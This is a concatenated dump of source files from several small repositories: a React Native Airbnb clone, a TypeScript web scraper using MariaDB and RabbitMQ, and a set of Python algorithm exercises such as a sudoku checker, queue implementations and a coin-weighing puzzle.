longDescription: '"Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?"'
},
{
id: '1',
image: 'https://notjustdev-dummy.s3.us-east-2.amazonaws.com/images/2.jpg',
type: 'Entire Flat',
title: 'NEW lux. apartment in the center of Santa Cruz',
bed: 3,
bedroom: 2,
oldPrice: 76,
newPrice: 65,
totalPrice: 390,
coordinate: {
latitude: 28.4815637,
longitude: -16.2291304,
},
longDescription: '"Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?"'
},
{
id: '2',
image: 'https://notjustdev-dummy.s3.us-east-2.amazonaws.com/images/3.jpg',
type: 'Private Property',
title: 'Green House Santa Cruz',
bed: 2,
bedroom: 1,
oldPrice: 64,
newPrice: 55,
totalPrice: 330,
coordinate: {
latitude: 28.2515637,
longitude: -16.3991304,
},
longDescription: '"Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?"'
},
{
id: '3',
image: 'https://notjustdev-dummy.s3.us-east-2.amazonaws.com/images/4.jpg',
type: 'Entire Flat',
title: 'Typical canarian house',
bed: 4,
bedroom: 3,
oldPrice: 120,
newPrice: 100,
totalPrice: 600,
coordinate: {
latitude: 28.4815637,
longitude: -16.2991304,
},
longDescription: '"Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?"'
},
];
<file_sep>import { useNavigation } from '@react-navigation/native'
import React, {useState} from 'react'
import { View, Text, Pressable } from 'react-native'
import styles from './styles'
const GuestScreen = () => {
const [adults, setAdults] = useState(0)
const [children, setChildren] = useState(0)
const [infants, setInfants] = useState(0)
const navigation = useNavigation()
return (
<View style={styles.container}>
<View>
{/* Adult Row */}
<View style={styles.row}>
{/* Row Name */}
<View style={styles.title}>
<Text style={{fontWeight: '700'}}>Adults</Text>
                    <Text style={{color: '#b8b8b8'}}>13 years and up</Text>
</View>
{/* Buttons */}
<View style={styles.buttons}>
{/* - */}
<Pressable
style={styles.numButton}
onPress={() => setAdults(Math.max(0,adults - 1))}
>
<Text style={{fontSize: 20, color: '#b8b8b8'}}>-</Text>
</Pressable>
{/* value */}
<Text style={styles.number}>{adults}</Text>
{/* + */}
<Pressable
style={styles.numButton}
onPress={() => setAdults(adults + 1)}
>
<Text style={{fontSize: 20, color: '#b8b8b8'}}>+</Text>
</Pressable>
</View>
</View>
{/* Children Row */}
<View style={styles.row}>
{/* Row Name */}
<View style={styles.title}>
<Text style={{fontWeight: '700'}}>Children</Text>
<Text style={{color: '#b8b8b8'}}>3 to 12</Text>
</View>
{/* Buttons */}
<View style={styles.buttons}>
{/* - */}
<Pressable
style={styles.numButton}
onPress={() => setChildren(Math.max(0,children - 1))}
>
<Text style={{fontSize: 20, color: '#b8b8b8'}}>-</Text>
</Pressable>
{/* value */}
<Text style={styles.number}>{children}</Text>
{/* + */}
<Pressable
style={styles.numButton}
onPress={() => setChildren(children + 1)}
>
<Text style={{fontSize: 20, color: '#b8b8b8'}}>+</Text>
</Pressable>
</View>
</View>
{/* Infant Row */}
<View style={styles.row}>
{/* Row Name */}
<View style={styles.title}>
<Text style={{fontWeight: '700'}}>Infants</Text>
<Text style={{color: '#b8b8b8'}}>0 to 1</Text>
</View>
{/* Buttons */}
<View style={styles.buttons}>
{/* - */}
<Pressable
style={styles.numButton}
onPress={() => setInfants(Math.max(0,infants - 1))}
>
<Text style={{fontSize: 20, color: '#b8b8b8'}}>-</Text>
</Pressable>
{/* value */}
<Text style={styles.number}>{infants}</Text>
{/* + */}
<Pressable
style={styles.numButton}
onPress={() => setInfants(infants + 1)}
>
<Text style={{fontSize: 20, color: '#b8b8b8'}}>+</Text>
</Pressable>
</View>
</View>
</View>
{/* Search Button */}
<Pressable
onPress={() =>
navigation.navigate('Home', {
screen: 'Explorer',
params: {
screen: 'SearchResult',
params: {
guests: adults + children + infants
}
}
})
}
style={styles.searchButton}
>
<Text style={styles.searchButtonText}>
Search
</Text>
</Pressable>
</View>
)
}
export default GuestScreen;
<file_sep>import React from 'react'
import { View, Text, Pressable } from 'react-native'
import { Auth } from 'aws-amplify';
const ProfileScreen = () => {
return (
<View style={{display: 'flex', justifyContent: 'center', alignItems: 'center', height: '100%'}}>
<Pressable
style={{backgroundColor: 'orange', padding: 5,borderRadius: 5, paddingHorizontal: 20}}
onPress={() => Auth.signOut()}
>
<Text style={{color: 'white', fontSize: 16, fontWeight: '700'}}>
Sign Out
</Text>
</Pressable>
</View>
)
}
export default ProfileScreen;
<file_sep>import { StyleSheet } from "react-native";
const styles = StyleSheet.create({
container : {
marginHorizontal: 20
},
textInput : {
fontSize: 20,
marginBottom: 20,
marginTop: 50
},
row : {
flexDirection: 'row',
alignItems: 'center',
borderBottomColor: '#5b5b5b',
borderBottomWidth: .5,
padding: 16
},
iconContainer : {
backgroundColor: '#cdcdcd',
borderRadius: 5,
padding: 5,
marginEnd: 10
},
locationText : {
fontSize: 16,
},
placeIcon:{
height: 25,
width: 25
}
})
export default styles;
<file_sep>import {StyleSheet, Dimensions} from 'react-native'
const styles = StyleSheet.create({
image : {
width: '100%',
height: 500,
resizeMode: 'contain',
justifyContent: 'center',
},
text : {
color: 'white',
fontWeight: '700',
fontSize: 80,
width: '70%',
padding: 20
},
button : {
marginStart: 20,
backgroundColor: 'white',
padding: 5,
width: 200,
borderRadius: 5,
alignItems: 'center',
},
buttonText : {
fontWeight: '700'
},
searchButton : {
alignItems: 'center',
zIndex: 100,
position: 'absolute',
top: 20,
width: Dimensions.get('screen').width - 20,
flexDirection: 'row',
justifyContent: 'center',
elevation: (Platform.OS === 'android') ? 50 : 0,
backgroundColor: 'white',
paddingVertical: 15,
borderRadius: 20,
marginHorizontal: 10
},
searchButtonText : {
fontWeight : '700',
paddingStart: 10
}
})
export default styles
<file_sep>import React from 'react'
import {NavigationContainer} from '@react-navigation/native'
import {createStackNavigator} from '@react-navigation/stack'
import DestinationSearchScreen from '../screens/DestinationSearch'
import GuestScreen from '../screens/Guests'
import MainTabNavigator from './MainTabNavigator'
import AccommodationScreen from '../screens/AccommodationScreen'
const Stack = createStackNavigator()
const Router = () => {
return (
<NavigationContainer>
<Stack.Navigator>
<Stack.Screen
name={"Home"}
component={MainTabNavigator}
options={{
headerShown: false
}}
/>
<Stack.Screen
name={"Destination Search"}
component={DestinationSearchScreen}
options={{
title: "Search your Destination"
}}
/>
<Stack.Screen
name={"Guest Search"}
component={GuestScreen}
options={{
title: "How many people?"
}}
/>
<Stack.Screen
name={"Accommodation Details"}
component={AccommodationScreen}
options={{
title: "The place details"
}}
/>
</Stack.Navigator>
</NavigationContainer>
)
}
export default Router;
|
49308fedd1e7649efb6cfb4a508852aff18bc31d
|
[
"JavaScript"
] | 11 |
JavaScript
|
JakeWayne07/Airbnb-React-Native
|
de92334b5480cf6f8bbf41b490cf59a5447391f6
|
b7c619fe9fd0f6fe53e3dc2c6452e91b00d9dad3
|
refs/heads/main
|
<repo_name>gsplash/Lusha<file_sep>/routes/index.ts
import {Router} from "express";
import {parse} from "./parse";
const router = Router()
router.use('/parse', parse);
export { router as routes };<file_sep>/modules/parse/services/parse.service.ts
import {AddWebContent, WebURLExists} from "../../web_content/daos/web_content.dao";
import axios from 'axios';
import {AddWebLinkToQueue} from "../../web_links/daos/web_links.dao";
export async function parseWebURLService(link: string) {
if(await WebURLExists(link)){
//TODO: add a log mentioning that nothing was done (?)
return;
}
let parseResponse;
try {
parseResponse = await parse(link);
} catch (err) {
throw new Error(`Failed to parse url '${link}' due to: ${err}`);
}
const webContent: IWebContent = {
url: link,
html: parseResponse.html
}
try {
await AddWebContent(webContent);
} catch (err) {
throw new Error(`Failed to add web content: ${err}`);
}
const promiseList: Promise<void>[] = [];
parseResponse.links.forEach((newLink: string) => {
    promiseList.push(AddWebLinkToQueue(newLink));
});
// wait for all requests to complete
//TODO: handle promise rejection (delete record from DB?)
await Promise.all(promiseList);
}
async function parse(link: string): Promise<IParseURLResponse> {
//get html content for current link
const html = (await axios.get(link)).data;
//start parse links (mock)
const randomLinks = ["https://google.com", "https://amazon.com", "https://lusha.com", "https://www.autodepot.co.il", "https://apple.com", "https://nasdaq.com","https://ksp.co.il/web/","https://www.ivory.co.il/","https://www.zap.co.il/","https://www.rabbitmq.com//"];
const numberOfLinks = Math.floor(Math.random() * Math.floor(randomLinks.length)) + 1;
const links = [];
// build random list of links
for (let i = 0; i < numberOfLinks; i++) {
const index = Math.floor(Math.random() * Math.floor(randomLinks.length));
links.push(...randomLinks.splice(index, 1));
}
//end parsing
return {
html,
links
}
}<file_sep>/modules/web_content/daos/web_content.dao.ts
import {getConnection} from '../../../data/mariadb'
export async function AddWebContent(content: IWebContent): Promise<void> {
try {
await (await getConnection()).query("INSERT INTO web_links (url,content) VALUES (?,?)",
[content.url, content.html]);
}catch (err){
//throw an error unless its due to duplicate entry
//TODO: add log ?
if(err.code.localeCompare('ER_DUP_ENTRY') !== 0){
throw err;
}
}
}
export async function WebURLExists(url: string): Promise<boolean> {
const res = await (await getConnection()).query("SELECT COUNT(*) as counter FROM web_links WHERE url=?", [url]);
return res?.[0]?.counter != 0;
}<file_sep>/modules/parse/middlewares/parse.middleware.ts
import {Request, Response, NextFunction} from "express";
import {StatusCodes} from 'http-status-codes';
import {parseWebURLService} from "../services/parse.service";
export async function parseWebURL(req: Request, res: Response, next: NextFunction) {
//TODO: check url is valid ?
if (!req.body?.url) {
    // return here so we don't fall through and try to parse a missing url
    return res.sendStatus(StatusCodes.BAD_REQUEST);
}
try {
await parseWebURLService(req.body.url);
res.json({
status: 'OK'
});
} catch (err) {
//TODO log error message ?
res.sendStatus(StatusCodes.INTERNAL_SERVER_ERROR);
}
}<file_sep>/routes/parse/index.ts
import express from 'express';
import {parseWebURL} from "../../modules/parse/middlewares/parse.middleware";
const router = express.Router()
//TODO: do we need to have permissions for these routes ?
router.use((req, res, next) => {
next();
});
router.post('/', parseWebURL);
export { router as parse };<file_sep>/.env.example
APP_PORT=
DB_HOST=
DB_USER=
DB_PWD=
DB_NAME=
RABBITMQ_CS=
RABBITMQ_LINK_Q_NAME=<file_sep>/modules/parse/models/parse.model.ts
interface IParseURLResponse{
html: string;
links: string[];
}
<file_sep>/data/rabbitmq.ts
import {ConfirmChannel, Connection} from "amqplib";
const amqp = require('amqplib');
let conn: Connection = null;
export async function getConnection(): Promise<Connection> {
if (conn == null) {
conn = await amqp.connect(process.env.RABBITMQ_CS);
}
return conn;
}
export async function sendMessageToQueue(queue: string, msg: string): Promise<void> {
    let ch: ConfirmChannel;
    try {
        ch = await (await getConnection()).createConfirmChannel();
    } catch (err) {
        throw new Error(`Failed connect to RabbitMQ: ${err}`);
    }
    try {
        // await the full assert/send/confirm sequence so the returned promise
        // only resolves once the broker has confirmed the message
        await ch.assertQueue(queue);
        ch.sendToQueue(queue, Buffer.from(msg), {persistent: true});
        await ch.waitForConfirms();
    } catch (err) {
        throw new Error(`Failed to send message to queue (msg: '${msg}'): ${err}`);
    } finally {
        await ch.close();
    }
}
require('dotenv').config();
import express from 'express';
import bodyParser from "body-parser";
import {routes} from "./routes";
const port = process.env.APP_PORT || 3000;
const app = express();
app.use(bodyParser.json());
app.use(routes);
app.listen(port);
<file_sep>/modules/web_links/daos/web_links.dao.ts
import {sendMessageToQueue} from '../../../data/rabbitmq'
const WEB_LINK_QUEUE = process.env.RABBITMQ_LINK_Q_NAME;
export async function AddWebLinkToQueue(link: string): Promise<void> {
await sendMessageToQueue(WEB_LINK_QUEUE, link);
}<file_sep>/worker.ts
import {Connection, ConsumeMessage} from "amqplib";
import {parseWebURLService} from "./modules/parse/services/parse.service";
import {getConnection} from "./data/rabbitmq";
require('dotenv').config();
getConnection().then(async (conn: Connection) => {
const ch = await conn.createChannel();
const onMessage = (msg: ConsumeMessage) => {
    const body = msg.content.toString();
    parseWebURLService(body).then(() => {
        ch.ack(msg);
    }).catch((err) => {
        console.warn(err);
        // reject without ack so the message is requeued and retried
        ch.nack(msg);
    });
};
ch.consume(process.env.RABBITMQ_LINK_Q_NAME, onMessage, {noAck: false}).catch(console.warn);
})<file_sep>/README.md
# WebScrapper
Simple web scraper
# What has been done
1. Created a `/parse` endpoint that receives a link and adds it to the DB.
Afterwards it builds a random array of preset URLs, queues each URL and, at the end, verifies that all the URLs were sent properly before sending a response to the client.
2. Created a RabbitMQ consumer (`worker.ts`) that reads messages from RabbitMQ (the URLs that were sent via the `/parse` endpoint) and then reuses the same functionality as the `/parse` endpoint.
## How to run
1. Make sure MariaDB is installed (can be downloaded from [here](https://mariadb.com/downloads/))
2. Make sure RabbitMQ is installed (can be downloaded from [here](https://www.rabbitmq.com/download.html))
3. Clone the repository from Github
4. Create a new DB in MariaDB and then create a table called `web_links` using
>CREATE TABLE `web_links` ( `url` VARCHAR(255) NOT NULL, `content` LONGTEXT, PRIMARY KEY (`url`) );
5. Install all package dependencies using
>npm i
6. Create a `.env` file in the project root according to `.env.example`
7. Run the service using
> npm start
## Assumptions
1. We would like to store both the http & https versions of the same link (not considered 'duplicates')
2. All messages sent to the queue are received (no failures in the connection / the queue is never full)
3. We want to parse each URL only once, so even if its content changes it will not be parsed again nor updated in our DB
4. URL content is not larger than `LONGTEXT`
## What can be improved
1. Add logs in certain parts to be able to debug & detect issues with the service
2. Use `flywaydb` to build the MariaDB schema
3. Use an ORM to connect & query MariaDB for better agility (lets us switch vendors easily)
4. Add protection for the `/parse` endpoint; currently anyone can submit URLs to parse
5. Add `insert_time` and `updated_time` to the `web_links` schema to get a better understanding of our data and be able to parse again after a certain time has passed
6. Split `server.ts` and `worker.ts` into 2 different services
7. OOP (?)
8. Add tests
9. Minify HTML content (?)
<file_sep>/data/mariadb.ts
import mariadb, {Pool} from 'mariadb';
let pool: Pool = null;
export async function getConnection(): Promise<Pool> {
if (pool == null) {
pool = await mariadb.createPool({
host: process.env.DB_HOST,
user: process.env.DB_USER,
password: process.env.DB_PWD,
database: process.env.DB_NAME
});
}
return pool;
}<file_sep>/modules/web_content/models/web_content.model.ts
interface IWebContent{
url: string;
html: string;
}
|
a9660c00aac672c7483cafcfb7c96d8fbdd4abf1
|
[
"Markdown",
"TypeScript",
"Shell"
] | 14 |
TypeScript
|
gsplash/Lusha
|
290e8582a363879952265c8bcf11fa78b80494e0
|
6de05a78644d6a322751fb44cab668aceee0a7d1
|
refs/heads/master
|
<repo_name>mgershovitz/maya_solves<file_sep>/seven-boom/seven_boom_alt.py
def divisible_by_seven(num):
divisible = num % 7 == 0
return divisible
def contains_seven(num):
contains = '7' in str(num)
return contains
def seven_boom():
num = 1
counter = 1
while True:
if counter == 7:
print("BOOM")
counter = 0
elif contains_seven(num):
print("BOOM")
else:
print(num)
num += 1
counter += 1
if __name__ == "__main__":
seven_boom()
<file_sep>/sudoku_checker_better.py
# Related blog post - https://algoritmim.co.il/2019/07/22/check-sudoku-better/
from math import sqrt
def check_valid_vector(vector):
num_set = set(vector)
return len(num_set) == 9
def check_row_and_columns_are_valid(sudoku):
for i in range(0, 9):
row = sudoku[i]
if not check_valid_vector(row):
return False
column = [sudoku[j][i] for j in range(0, 9)]
if not check_valid_vector(column):
return False
return True
def check_cubes_are_valid(sudoku, board_size):
cube_size = int(sqrt(board_size))
for cube_row in range(0, cube_size):
for cube_column in range(0, cube_size):
cube = []
for i in range(0, cube_size):
for j in range(0, cube_size):
row = cube_row * cube_size + i
column = cube_column * cube_size + j
cube.append(sudoku[row][column])
if not check_valid_vector(cube):
return False
return True
def check_sudoku_is_valid(sudoku):
board_size = len(sudoku)
return check_row_and_columns_are_valid(sudoku) and check_cubes_are_valid(sudoku, board_size)
def run_tests():
valid_sudoku = [[5, 3, 4, 6, 7, 8, 9, 1, 2],
[6, 7, 2, 1, 9, 5, 3, 4, 8],
[1, 9, 8, 3, 4, 2, 5, 6, 7],
[8, 5, 9, 7, 6, 1, 4, 2, 3],
[4, 2, 6, 8, 5, 3, 7, 9, 1],
[7, 1, 3, 9, 2, 4, 8, 5, 6],
[9, 6, 1, 5, 3, 7, 2, 8, 4],
[2, 8, 7, 4, 1, 9, 6, 3, 5],
[3, 4, 5, 2, 8, 6, 1, 7, 9]]
assert check_sudoku_is_valid(valid_sudoku)
not_valid_sudoku = [[5, 3, 4, 6, 7, 8, 9, 1, 2],
[6, 7, 2, 1, 9, 5, 3, 4, 8],
[1, 9, 8, 3, 4, 2, 5, 6, 7],
[8, 5, 9, 7, 6, 1, 4, 2, 3],
[4, 2, 6, 8, 5, 3, 7, 9, 1],
[7, 1, 3, 9, 2, 4, 8, 5, 6],
[9, 6, 1, 5, 3, 7, 2, 8, 4],
[2, 8, 7, 4, 1, 9, 6, 3, 5],
[3, 4, 7, 2, 8, 6, 1, 5, 9]]
assert not check_sudoku_is_valid(not_valid_sudoku)
if __name__ == '__main__':
run_tests()
<file_sep>/longest_sub_sequence_length.py
# Related blog post - https://algoritmim.co.il/2019/08/04/longest-subsequence-length/
def longest_subsequence_length(arr):
longest_length = 0
seq = dict()
for n in arr:
if n - 1 in seq:
seq_min = seq.pop(n - 1)[0]
else:
seq_min = n
if n + 1 in seq:
seq_max = seq.pop(n + 1)[1]
else:
seq_max = n
current_seq = (seq_min, seq_max)
seq[seq_min] = seq[seq_max] = current_seq
longest_length = max(longest_length, current_seq[1]-current_seq[0] + 1)
return longest_length
def run_tests():
assert longest_subsequence_length([2, 5, 3, 10, 9, 4]) == 4
assert longest_subsequence_length([2]) == 1
assert longest_subsequence_length([2, 4, 7, 20, 0]) == 1
assert longest_subsequence_length([101, 2, 3, 4, 5, 6, 100, 1]) == 6
assert longest_subsequence_length([]) == 0
if __name__ == '__main__':
run_tests()<file_sep>/bit_manipulation/README.md
A collection of simple bit manipulation exercises in Python.
Related blog post - https://algoritmim.co.il/2019/07/25/or-xor-and-shift/<file_sep>/copy_bits.py
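For reference, a quick illustration of the operators the exercises revolve around — the values here are arbitrary, not taken from the exercises themselves:

```python
# Bitwise operators on two small illustrative values.
a, b = 0b1100, 0b1010

print(bin(a & b))   # AND keeps bits set in both operands  -> 0b1000
print(bin(a | b))   # OR keeps bits set in either operand  -> 0b1110
print(bin(a ^ b))   # XOR keeps bits set in exactly one    -> 0b110
print(bin(a << 1))  # left shift multiplies by 2           -> 0b11000
print(bin(a >> 2))  # right shift floor-divides by 4       -> 0b11
```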
# Related blog post - https://algoritmim.co.il/2019/06/25/copy-bits/
def copy_bits(N, M, i, j):
x = -1 << i
y = (1 << j+1) - 1
mask = ~(x & y)
N = N & mask
M = M << i
return N | M
def run_tests():
assert copy_bits(0, 0, 2, 6) == 0
assert copy_bits(1, 0, 2, 6) == 1
assert copy_bits(1, 0, 0, 1) == 0
assert copy_bits(int('10001111100', 2), int('10011', 2), 2, 6) == int('10001001100', 2)
assert copy_bits(int('11111111111', 2), int('0000', 2), 5, 8) == int('11000011111', 2)
if __name__ == '__main__':
run_tests()<file_sep>/seven-boom/seven_boom_original.py
def divisible_by_seven(num):
divisible = num % 7 == 0
return divisible
def contains_seven(num):
contains = '7' in str(num)
return contains
def seven_boom():
num = 1
while True:
if divisible_by_seven(num) | contains_seven(num):
print("BOOM")
else:
print(num)
num += 1
if __name__ == "__main__":
seven_boom()
<file_sep>/queues/linked_list_queue.py
class LinkedListNode:
def __init__(self, value):
self.__value = value
self.next_node = None
def value(self):
return self.__value
def set_next(self, node):
self.next_node = node
def get_next(self):
return self.next_node
class NullNode(LinkedListNode):
def __init__(self):
super().__init__(None)
class LinkedListQueue:
def __init__(self):
self.__queue_size = 0
self.first_node = NullNode()
self.last_node = NullNode()
def size(self):
return self.__queue_size
def add(self, value):
if self.__queue_size == 0:
self.first_node = LinkedListNode(value)
self.first_node.set_next(NullNode())
self.last_node = self.first_node
else:
new_last_node = LinkedListNode(value)
self.last_node.set_next(new_last_node)
self.last_node = new_last_node
self.__queue_size += 1
def pop_first(self):
if self.__queue_size == 0:
return None
else:
first_value = self.first_node.value()
self.first_node = self.first_node.get_next()
self.__queue_size -= 1
return first_value
def test():
q = LinkedListQueue()
assert (q.pop_first() is None)
q.add(1)
q.add(2)
assert (q.pop_first() == 1)
assert (q.pop_first() == 2)
assert (q.pop_first() is None)
assert (q.size() == 0)
<file_sep>/coins_and_weights.py
# Related blog post - https://algoritmim.co.il/2019/07/09/coins-and-weights/
class Scale(object):
def __init__(self):
self.weigh_count = 0
def weigh(self, coins_x, coins_y):
self.weigh_count += 1
if sum(coins_x) > sum(coins_y):
return 1
elif sum(coins_y) > sum(coins_x):
return -1
else:
return 0
class CoinsAndWeights(object):
def __init__(self):
self.scale = Scale()
@staticmethod
def divide_group_to_three(group):
groups_size = int(len(group)/3)
groups = []
for i in range(0, 3):
groups.append(group[groups_size * i: groups_size * (i + 1)])
return groups
@staticmethod
def add_regular_coins_to_odd_group(odd_group, control_group):
if len(odd_group) % 3 == 1:
odd_group.extend(control_group[0:2])
elif len(odd_group) % 3 == 2:
odd_group.extend(control_group[0:1])
def find_odd_group(self, coins, odd_coin_weight):
x, y, z = self.divide_group_to_three(coins)
first_weigh = self.scale.weigh(x, y)
if first_weigh == 0:
return z
else:
if first_weigh == odd_coin_weight:
return x
else:
return y
def find_odd_group_and_odd_weight(self, coins):
x, y, z = self.divide_group_to_three(coins)
first_weigh = self.scale.weigh(x, y)
second_weigh = self.scale.weigh(x, z)
if first_weigh == 0 and second_weigh == 0:
return None, None, None
if first_weigh == 0:
odd_group = z
control_group = x
odd_coin_weight = -1 * second_weigh
elif second_weigh == 0:
odd_group = y
control_group = x
odd_coin_weight = -1 * first_weigh
else:
odd_group = x
control_group = y
odd_coin_weight = first_weigh
return odd_group, control_group, odd_coin_weight
def find_odd_coin(self, coins):
coins_remainder_group_size = len(coins) % 3
main_groups_size = len(coins) - coins_remainder_group_size
coins_remainder_group = coins[main_groups_size:]
coins = coins[:main_groups_size]
odd_group, control_group, odd_coin_weight = \
self.find_odd_group_and_odd_weight(coins)
if odd_group is None:
# odd coin is in the remainder group
self.add_regular_coins_to_odd_group(coins_remainder_group, coins)
odd_group, _, _ = self.find_odd_group_and_odd_weight(coins_remainder_group)
return odd_group[0]
while len(odd_group) > 1:
self.add_regular_coins_to_odd_group(odd_group, control_group)
odd_group = self.find_odd_group(odd_group, odd_coin_weight)
return odd_group[0]
def run_tests():
caw = CoinsAndWeights()
coins = [0, 0, 1]
assert caw.find_odd_coin(coins) == 1
assert caw.scale.weigh_count == 2
caw = CoinsAndWeights()
coins = [0, 1, 1]
assert caw.find_odd_coin(coins) == 0
assert caw.scale.weigh_count == 2
caw = CoinsAndWeights()
coins = [1] * 27
coins[10] = 3
assert caw.find_odd_coin(coins) == 3
assert caw.scale.weigh_count == 4
caw = CoinsAndWeights()
coins = [1] * 28
coins[27] = -1
assert caw.find_odd_coin(coins) == -1
assert caw.scale.weigh_count == 4
caw = CoinsAndWeights()
coins = [1] * 100000
coins[9007] = 3
assert caw.find_odd_coin(coins) == 3
assert caw.scale.weigh_count == 12
if __name__ == '__main__':
run_tests()<file_sep>/calculator/README.md
An implementation of a "flexible" calculator that receives
a mathematical expression in the form of a list of characters,
and recursively calculates the result.
The calculator allows the user to choose one of two possible
mathematical notations for interpreting the given expression.
The two notations differ specifically in the interpretation
of implied multiplication -
1. 8÷2(2+2) = 8÷2*(2+2) = 8÷2*4 = 4*4 = 16
2. 8÷2(2+2) = 8/(2*(2+2)) = 8/(2*4) = 8/8 = 1
Related blog posts -
Calculator part A - https://algoritmim.co.il/2019/08/24/cala-part-a/
Calculator part B - https://algoritmim.co.il/2019/08/24/cala-part-b/<file_sep>/first_ancestor.py
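The two interpretations above can be checked numerically, independent of the calculator implementation: writing the implied multiplication out with explicit operators and parentheses lets plain Python reproduce both results.

```python
# Notation 1: implied multiplication binds like an ordinary '*',
# so the expression is evaluated left to right.
notation_1 = 8 / 2 * (2 + 2)

# Notation 2: implied multiplication binds tighter than division,
# so 2(2+2) is grouped before the division.
notation_2 = 8 / (2 * (2 + 2))

print(notation_1)  # 16.0
print(notation_2)  # 1.0
```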
# Related blog post - https://algoritmim.co.il/2019/06/24/first-ancestor/
class Node(object):
def __init__(self, val, parent):
self.val = val
self.parent = parent
self.visited = False
def __repr__(self):
return self.val
def find_first_ancestor_recur(x, y):
if x is not None and y is not None and x == y:
return x
next_nodes = []
for node in [x, y]:
if node is not None:
if node.visited:
return node
else:
node.visited = True
next_nodes.append(node.parent)
return find_first_ancestor_recur(next_nodes[0], next_nodes[1])
def find_first_ancestor(x, y):
if x.parent is None or y.parent is None:
return
return find_first_ancestor_recur(x.parent, y.parent)
def run_tests():
a = Node("A", None)
assert find_first_ancestor(a, a) is None
b = Node("B", a)
c = Node("C", a)
assert find_first_ancestor(b, c) == a
d = Node("D", b)
e = Node("E", d)
f = Node("F", d)
assert find_first_ancestor(b, c) == a
assert find_first_ancestor(d, e) == b
assert find_first_ancestor(f, e) == d
assert find_first_ancestor(e, c) == a
if __name__ == '__main__':
run_tests()<file_sep>/approximate_sort.py
# Related blog post - https://algoritmim.co.il/2019/06/19/approximate-sort/
from heapq import heappop, heappush
def sort_approximate(arr, k):
if k == 0:
return arr
sorted_arr = list()
heap = []
for i in range(0, k):
heappush(heap, arr[i])
for i in range(k, len(arr)):
sorted_arr.append(heappop(heap))
heappush(heap,arr[i])
for i in range(0, k):
sorted_arr.append(heappop(heap))
return sorted_arr
def run_tests():
examples = [
(3,[3, 1, 4, 2, 7, 6, 5]),
(0,[1,2]),
(7, [3, 1, 4, 2, 7, 6, 5]),
(7, [35, 70, 61, 24, 53, 40, 1, 14, 30, 29, 100, 99, 36]),
]
for (k,arr) in examples:
print("Original array - ")
print(arr)
sorted_array = sort_approximate(arr, k)
print("Array after sorting - ")
print(sorted_array)
if __name__ == '__main__':
run_tests()
<file_sep>/Mastermind/app/main.py
import random
from consts import *
from app.game_logic.player import get_player_guess
from app.game_logic.checkers import check_player_guess_with_duplicates
def generate_code():
code = []
for i in range(0, CODE_LENGTH):
code.append(random.choice(COLORS))
return code
def play():
computer_code = generate_code()
game_won = False
rounds = 0
while not game_won and rounds < TOTAL_ROUNDS:
player_guess = get_player_guess()
bul, pgia = check_player_guess_with_duplicates(computer_code, player_guess)
if bul == CODE_LENGTH:
game_won = True
break
else:
print(USER_SCORE.format(bul, pgia))
rounds += 1
if game_won:
print(USER_WON)
else:
print(USER_LOST)
if __name__ == '__main__':
play()
<file_sep>/queues/indexed_queue.py
class IndexedQueue:
def __init__(self):
self.queue = list()
self.__queue_size = 0
self.start_index = 0
def size(self):
return self.__queue_size
def add(self, item):
self.queue.append(item)
self.__queue_size += 1
def pop_first(self):
    if self.__queue_size == 0:
        return None
    # items before start_index have already been popped
    first_item = self.queue[self.start_index]
    self.__queue_size -= 1
    self.start_index += 1
    return first_item
def test():
q = IndexedQueue()
assert (q.pop_first() is None)
q.add(1)
q.add(2)
assert (q.pop_first() == 1)
assert (q.pop_first() == 2)
assert (q.pop_first() is None)
assert (q.size() == 0)
<file_sep>/hello_world/hello_world_go.go
package main
import "fmt"
func main() {
space := ""
